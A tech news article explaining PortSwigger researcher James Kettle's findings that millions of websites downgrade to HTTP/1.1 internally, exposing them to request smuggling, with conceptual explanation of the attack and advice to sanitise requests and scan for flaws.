- A single manipulated packet can cause a website to mix up user sessions, leak confidential info, or serve poisoned content that infects everyone who visits.
- After two decades of attempted patches, the protocol remains fundamentally unsafe whenever proxies or shared connections are involved.
- Until full HTTP/2 support arrives everywhere, organisations need to aggressively sanitise incoming requests and routinely scan for lurking vulnerabilities.
Just because a website uses shiny new security badges on the surface doesnโt mean itโs locked up tight behind the scenes.
Recent research has unveiled a worrying reality under the hood: millions of websites, even those behind cutting-edge proxies and cloud platforms, are silently backsliding to the outdated HTTP/1.1 protocol somewhere along the request chain. This isnโt just a touch of technical debtโitโs a cybercriminalโs dream come true.
How traffic flows
When you click on a website in 2025, your request doesnโt go straight to its destination. It bounces aroundโfrom your browser, through content delivery networks, load balancers, proxies, and then finally hits the websiteโs back-end servers.
Somewhere along this relay, if one component only speaks the old HTTP/1.1, the whole secure foundation can be undermined.
PortSwigger, the well-known application security firm, threw a spotlight on this issue. They found that over 24 million websitesโyes, even big corporate onesโstill downgrade requests to HTTP/1.1, despite advertising modern security up front. This isnโt just nostalgia for the early 2000s; itโs a recipe for disaster.
The fatal flaw: Request smuggling
So, what makes HTTP/1.1 so risky? In a word: ambiguity. The protocol simply lumps requests together on a TCP connection, with multiple ways to specify where one ends and the next begins. That means hackers can trigger so-called “request smuggling” attacks, slipping malicious requests between legitimate ones.
Suddenly, servers have no idea which data belongs to which userโa perfect opening for session hijacking, data theft, or worse.
Cybersecurity researcher James Kettle, from PortSwigger, revealed all this at Black Hat USA and DEF CONโearning hefty bug bounty rewards in the process. The flaw is so severe that a single manipulated packet can cause a website to mix up user sessions, leak confidential info, or serve poisoned content that infects everyone who visits.
Just imagine: logging in to your favourite online store and landing in another customerโs account instead, or having every page you load laced with credit card-stealing code.
Why are we still using HTTP/1.1?
Alarmingly, the inertia isnโt just on small-time web hosts. Major cloud service providers like Google and Cloudflare still default to HTTP/1.1 internally unless admins painstakingly reconfigure every layer.
The industryโs mainstay front-endsโNginx, Akamai, Fastly, CloudFrontโoften lack full upstream HTTP/2 support, making upgrades a real challenge.
Website operators canโt just flip a magic switch and hope for safety. Every component in the chain, from CDN to app server, must support the newer protocols and be configured to reject risky, ambiguous requests. Thatโs rarely the default, and it requires technical finesse that many organisations lack.
This isnโt theoryโattackers have already shown how devastating these flaws can be. Security researchers demonstrated successful request smuggling hacks against giants like PayPal, exposing unencrypted passwords and siphoning off bug bounties for their trouble.
The ease with which such bugs can be exploited is alarming: all it takes is a tiny inconsistency between how two servers interpret an HTTP request.
For example, if a request headers both a “Content-Length” and a “Transfer-Encoding: chunked” flag, different parts of the server chain might read the data differently.
An attacker can send a malformed payload that one server thinks is overโand another server keeps reading. The result? Malicious code gets silently attached to a victimโs request.
Can we fix HTTP/1.1?
Not really, says Kettle. After two decades of attempted patches, the protocol remains fundamentally unsafe whenever proxies or shared connections are involved. “If we want a secure web, HTTP/1.1 must die,” he warns.
While itโs still safe for straight, direct client-server connections, the web is rarely that simple nowadays.
Until full HTTP/2 support arrives everywhere, organisations need to aggressively sanitise incoming requests and routinely scan for lurking vulnerabilities.
PortSwiggerโs latest HTTP Request Smuggler tool even automates the search for hidden flaws, but thatโs just playing catch-up.
No matter how pretty a website looks or how many security logos it displays, it could still be vulnerable deep in its infrastructure. Any delay just gives hackers more opportunities to slip through the cracks.
Discover more from TechChannel News
Subscribe to get the latest posts sent to your email.




